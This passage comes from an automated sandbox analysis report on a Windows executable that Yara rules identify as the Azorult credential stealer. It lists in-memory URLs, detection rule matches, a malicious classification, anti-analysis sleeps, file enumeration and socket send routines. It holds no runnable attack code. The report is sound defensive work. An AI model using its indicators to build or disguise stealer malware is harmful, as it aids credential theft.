              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ManUtd
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://uk.joiebaby.com/liverpoolfc/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://uk.tigerwit.com/about/liverpool
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.acronis.com/en-gb/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.axa.com/?utm_source=liverpoolfc&amp;utm_medium=logo-partnership&amp;utm_campaign=lfc1819
              Source: e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpString found in binary or memory: https://www.chelseafc.com
              Source: e0YQRfcpqS.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.easports.com/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.expedia.co.uk/
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M54566
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.hollyfrontier.com/home/default.aspx
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.levi.com/GB/en_GB/
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmp, e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/match/2020-21/first-team/fixtures-and-results
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/membership
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/my-lfc/join/user-details?user_type=free
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/tickets
              Source: e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.comH
              Source: e0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmp, e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRmYpu
              Source: e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/
              Source: e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Accessibility
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Privacy-Policy
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Partners/Global/Visit-Malta
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/help/club-contacts?int_source=manutd.com&amp;int_medium=menu&amp;int_campa
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/marriott-hotels
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/swissquote
              Source: e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com4
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.mitel.com/learn/case-studies/liverpool-football-club
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.mondelezinternational.com/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.nike.com/gb/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.quorn.com/
              Source: e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmp, e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRm
              Source: e0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com4
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.snapchat.com/
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.tourism-mauritius.mu
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.twitter.com/realmadrid
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/manutd
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/realmadrid
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 0_2_031ED0040_2_031ED004
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 0_2_031EF4700_2_031EF470
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 0_2_031EB1840_2_031EB184
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 0_2_031EDA000_2_031EDA00
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 0_2_031ED9F00_2_031ED9F0
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: String function: 00403B98 appears 44 times
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: String function: 00404E64 appears 33 times
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: String function: 00404E3C appears 87 times
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: String function: 004062D8 appears 34 times
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: String function: 004034E4 appears 36 times
              Source: e0YQRfcpqS.exeStatic PE information: invalid certificate
              Source: e0YQRfcpqS.exe, 00000000.00000002.276024576.0000000004361000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHIT.dll* vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.271905116.0000000000F36000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSmtpSection.exe8 vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.272749215.0000000003361000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMCjd Esf.exe2 vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.279728666.0000000006E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exeBinary or memory string: OriginalFilename vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000006.00000002.272256972.0000000000566000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSmtpSection.exe8 vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameMCjd Esf.exe2 vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exeBinary or memory string: OriginalFilenameSmtpSection.exe8 vs e0YQRfcpqS.exe
              Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: classification engineClassification label: mal92.troj.spyw.winEXE@3/4@23/4
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile created: C:\Users\user\AppData\Local\gLCtQBLkJiklhuQmKxvHxPdgEJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7566F0FB-F79707E2-6EF13B97
              Source: e0YQRfcpqS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: e0YQRfcpqS.exeReversingLabs: Detection: 10%
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile read: C:\Users\user\Desktop\e0YQRfcpqS.exe:Zone.IdentifierJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\e0YQRfcpqS.exe 'C:\Users\user\Desktop\e0YQRfcpqS.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\e0YQRfcpqS.exe C:\Users\user\Desktop\e0YQRfcpqS.exe
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess created: C:\Users\user\Desktop\e0YQRfcpqS.exe C:\Users\user\Desktop\e0YQRfcpqS.exeJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: e0YQRfcpqS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: e0YQRfcpqS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              barindex
              Binary contains a suspicious time stampShow sources
              Source: initial sampleStatic PE information: 0xFABC5879 [Sun Apr 22 01:10:17 2103 UTC]
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket,6_2_00418124
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040D86E push 0040D89Ch; ret 6_2_0040D894
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040D870 push 0040D89Ch; ret 6_2_0040D894
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_004140C0 push 004140ECh; ret 6_2_004140E4
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_004108C8 push 004108F4h; ret 6_2_004108EC
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040B0F7 push 0040B124h; ret 6_2_0040B11C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040B0F8 push 0040B124h; ret 6_2_0040B11C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00408080 push 004080B8h; ret 6_2_004080B0
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00408158 push 00408196h; ret 6_2_0040818E
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00408970 push 004089E4h; ret 6_2_004089DC
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00408994 push 004089E4h; ret 6_2_004089DC
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_004089AC push 004089E4h; ret 6_2_004089DC
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00415208 push 0041528Ch; ret 6_2_00415284
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040CA0C push 0040CA3Ch; ret 6_2_0040CA34
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040CA10 push 0040CA3Ch; ret 6_2_0040CA34
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00417AEC push 00417B18h; ret 6_2_00417B10
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00404BC0 push 00404C11h; ret 6_2_00404C09
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040D3C0 push 0040D3ECh; ret 6_2_0040D3E4
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040A3E4 push 0040A410h; ret 6_2_0040A408
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040C390 push 0040C3C0h; ret 6_2_0040C3B8
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040C394 push 0040C3C0h; ret 6_2_0040C3B8
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040A3AC push 0040A3D8h; ret 6_2_0040A3D0
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040DC44 push 0040DCA3h; ret 6_2_0040DC9B
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040DC0C push 0040DC38h; ret 6_2_0040DC30
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0041B417 push ecx; iretd 6_2_0041B427
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040B41E push 0040B44Ch; ret 6_2_0040B444
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040B420 push 0040B44Ch; ret 6_2_0040B444
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0040A438 push 0040A464h; ret 6_2_0040A45C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0041A4F4 push 0041A51Ah; ret 6_2_0041A512
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00414C80 push 00414CACh; ret 6_2_00414CA4
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00409488 push 004094B8h; ret 6_2_004094B0
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0041A4AC push 0041A4E8h; ret 6_2_0041A4E0
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_00417B1A
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe TID: 3020Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe TID: 4012Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe TID: 5420Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0041303C FindFirstFileW,FindNextFileW,FindClose,6_2_0041303C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,6_2_004111C4
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,6_2_00414408
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,6_2_00414408
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_0041158C FindFirstFileW,FindNextFileW,FindClose,6_2_0041158C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00411590 FindFirstFileW,FindNextFileW,FindClose,6_2_00411590
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,6_2_00412D9C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00416740 GetSystemInfo,6_2_00416740
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: e0YQRfcpqS.exe, 00000000.00000002.278575004.0000000006340000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket,6_2_00418124
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: 6_2_00407A34 mov eax, dword ptr fs:[00000030h]6_2_00407A34
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeProcess created: C:\Users\user\Desktop\e0YQRfcpqS.exe C:\Users\user\Desktop\e0YQRfcpqS.exeJump to behavior
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeCode function: GetLocaleInfoA,6_2_00404B4C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exeQueries volume information: C:\Users\user\Desktop\e0YQRfcpqS.exe VolumeInformationJump to behavior
